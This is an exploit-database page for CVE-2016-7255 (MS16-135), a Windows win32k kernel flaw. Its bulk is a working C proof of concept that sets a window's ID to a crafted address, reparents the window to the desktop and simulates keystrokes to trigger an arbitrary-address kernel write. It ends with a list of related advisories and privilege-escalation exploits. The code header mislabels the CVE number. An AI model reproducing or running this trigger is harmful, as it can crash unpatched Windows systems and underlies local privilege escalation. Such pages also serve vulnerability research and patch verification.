Lucene search
TinySec1337DAY-ID-26297HistoryNov 10, 2016 - 12:00 a.m.
Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Exploit
2016-11-1000:00:00
TinySec
0day.today
89
0.012 Low
EPSS
Percentile
83.2%
Exploit for windows platform in category dos / poc
/*
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255
Full Proof of Concept:
https://github.com/tinysec/public/tree/master/CVE-2016-7255
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip
********************************************************************
Created: 2016-11-09 14:23:09
Filename: main.c
Author: root[at]TinySec.net
Version 0.0.0.1
Purpose: poc of cve-2016-0075
*********************************************************************
*/
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
//////////////////////////////////////////////////////////////////////////
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#undef DbgPrint
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
CHAR* pszDbgBuff = NULL;
va_list VaList=NULL;
ULONG ulRet = 0;
do
{
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
if (NULL == pszDbgBuff)
{
break;
}
RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));
va_start(VaList,Format);
_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);
DbgPrintEx(77 , 0 , pszDbgBuff );
OutputDebugStringA(pszDbgBuff);
va_end(VaList);
} while (FALSE);
if (NULL != pszDbgBuff)
{
HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
pszDbgBuff = NULL;
}
return ulRet;
}
int _sim_key_down(WORD wKey)
{
INPUT stInput = {0};
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = 0;
SendInput(1 , &stInput , sizeof(stInput) );
} while (FALSE);
return 0;
}
int _sim_key_up(WORD wKey)
{
INPUT stInput = {0};
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1 , &stInput , sizeof(stInput) );
} while (FALSE);
return 0;
}
int _sim_alt_shift_esc()
{
int i = 0;
do
{
_sim_key_down( VK_MENU );
_sim_key_down( VK_SHIFT );
_sim_key_down( VK_ESCAPE);
_sim_key_up( VK_ESCAPE);
_sim_key_down( VK_ESCAPE);
_sim_key_up( VK_ESCAPE);
_sim_key_up( VK_MENU );
_sim_key_up( VK_SHIFT );
} while (FALSE);
return 0;
}
int _sim_alt_shift_tab(int nCount)
{
int i = 0;
HWND hWnd = NULL;
int nFinalRet = -1;
do
{
_sim_key_down( VK_MENU );
_sim_key_down( VK_SHIFT );
for ( i = 0; i < nCount ; i++)
{
_sim_key_down( VK_TAB);
_sim_key_up( VK_TAB);
Sleep(1000);
}
_sim_key_up( VK_MENU );
_sim_key_up( VK_SHIFT );
} while (FALSE);
return nFinalRet;
}
int or_address_value_4(__in void* pAddress)
{
WNDCLASSEXW stWC = {0};
HWND hWndParent = NULL;
HWND hWndChild = NULL;
WCHAR* pszClassName = L"cve-2016-7255";
WCHAR* pszTitleName = L"cve-2016-7255";
void* pId = NULL;
MSG stMsg = {0};
do
{
stWC.cbSize = sizeof(stWC);
stWC.lpfnWndProc = DefWindowProcW;
stWC.lpszClassName = pszClassName;
if ( 0 == RegisterClassExW(&stWC) )
{
break;
}
hWndParent = CreateWindowExW(
0,
pszClassName,
NULL,
WS_OVERLAPPEDWINDOW|WS_VISIBLE,
0,
0,
360,
360,
NULL,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndParent)
{
break;
}
hWndChild = CreateWindowExW(
0,
pszClassName,
pszTitleName,
WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,
0,
0,
160,
160,
hWndParent,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndChild)
{
break;
}
#ifdef _WIN64
pId = ( (UCHAR*)pAddress - 0x28 );
#else
pId = ( (UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64
SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );
DbgPrint("hWndChild = 0x%p\n" , hWndChild);
DebugBreak();
ShowWindow(hWndParent , SW_SHOWNORMAL);
SetParent(hWndChild , GetDesktopWindow() );
SetForegroundWindow(hWndChild);
_sim_alt_shift_tab(4);
SwitchToThisWindow(hWndChild , TRUE);
_sim_alt_shift_esc();
while( GetMessage(&stMsg , NULL , 0 , 0) )
{
TranslateMessage(&stMsg);
DispatchMessage(&stMsg);
}
} while (FALSE);
if ( NULL != hWndParent )
{
DestroyWindow(hWndParent);
hWndParent = NULL;
}
if ( NULL != hWndChild )
{
DestroyWindow(hWndChild);
hWndChild = NULL;
}
UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );
return 0;
}
int __cdecl wmain(int nArgc, WCHAR** Argv)
{
do
{
or_address_value_4( (void*)0xFFFFFFFF );
} while (FALSE);
return 0;
}
# 0day.today [2018-01-03] #Related
checkpoint_advisories
checkpoint_advisories
Microsoft Windows Win32k Elevation of Privilege (MS16-135: CVE-2016-7255)
2016-11-08 00:00:00
symantec
symantec
zdt
zdt
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2)
2017-01-11 00:00:00
Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13
2016-11-24 00:00:00
Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit
2022-02-28 00:00:00
myhack58
myhack58
fireeye
fireeye
EPS Processing Zero-Days Exploited by Multiple Threat Actors
2017-05-09 13:00:00
packetstorm
packetstorm
Microsoft Windows Kernel win32k.sys NtSetWindowLongPtr Privilege Escalation
2017-01-12 00:00:00
Microsoft Windows kernel win32k Denial Of Service
2016-11-14 00:00:00
Win32k ConsoleControl Offset Confusion
2021-03-19 00:00:00
attackerkb
attackerkb
CVE-2016-7255
2016-11-10 00:00:00
mscve
mscve
Win32k Elevation of Privilege Vulnerability
2016-11-08 08:00:00
cve
cve
CVE-2016-7255
2016-11-10 07:00:00
prion
prion
Privilege escalation
2016-11-10 07:00:00
exploitpack
exploitpack
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)
2017-01-08 00:00:00
Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
2016-11-09 00:00:00
Microsoft Windows - Win32k Local Privilege Escalation
2019-05-15 00:00:00
thn
thn
Microsoft Patches Windows Zero-Day Flaw Disclosed by Google
2016-11-09 06:12:00
Researchers Fingerprint Exploit Developers Who Help Several Malware Authors
2020-10-02 09:59:00
seebug
seebug
Win32k elevation of privilege vulnerability MS16-135οΌ(CVE-2016-7255)
2016-11-10 00:00:00
cisa_kev
cisa_kev
Microsoft Win32k Privilege Escalation Vulnerability
2021-11-03 00:00:00
exploitdb
exploitdb
Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)
2017-01-08 00:00:00
Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)
2016-11-09 00:00:00
Microsoft Windows - 'Win32k' Local Privilege Escalation
2019-05-15 00:00:00
canvas
canvas
Immunity Canvas: MS16_135
2016-11-10 02:00:09
mskb
mskb
metasploit
metasploit
Win32k ConsoleControl Offset Confusion
2022-02-18 20:23:38
githubexploit
githubexploit
Exploit for Out-of-bounds Write in Microsoft
2020-07-19 08:20:57
mmpc
mmpc
Hardening Windows 10 with zero-day exploit mitigations
2017-01-13 21:28:49
openvas
openvas
Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)
2016-11-09 00:00:00
nessus
nessus
MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)
2016-11-08 00:00:00
securelist
securelist
The zero-day exploits of Operation WizardOpium
2020-05-28 10:00:09
threatpost
threatpost
Microsoft Patches Zero Day Disclosed by Google
2016-11-08 14:57:26
googleprojectzero
googleprojectzero
wallarmlab
wallarmlab
kaspersky
kaspersky
KLA11832 Multiple vulnerabilities in Microsoft Products (ESU)
2016-11-08 00:00:00
KLA10897 Multiple vulnerabilities in Microsoft Windows
2016-11-08 00:00:00
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00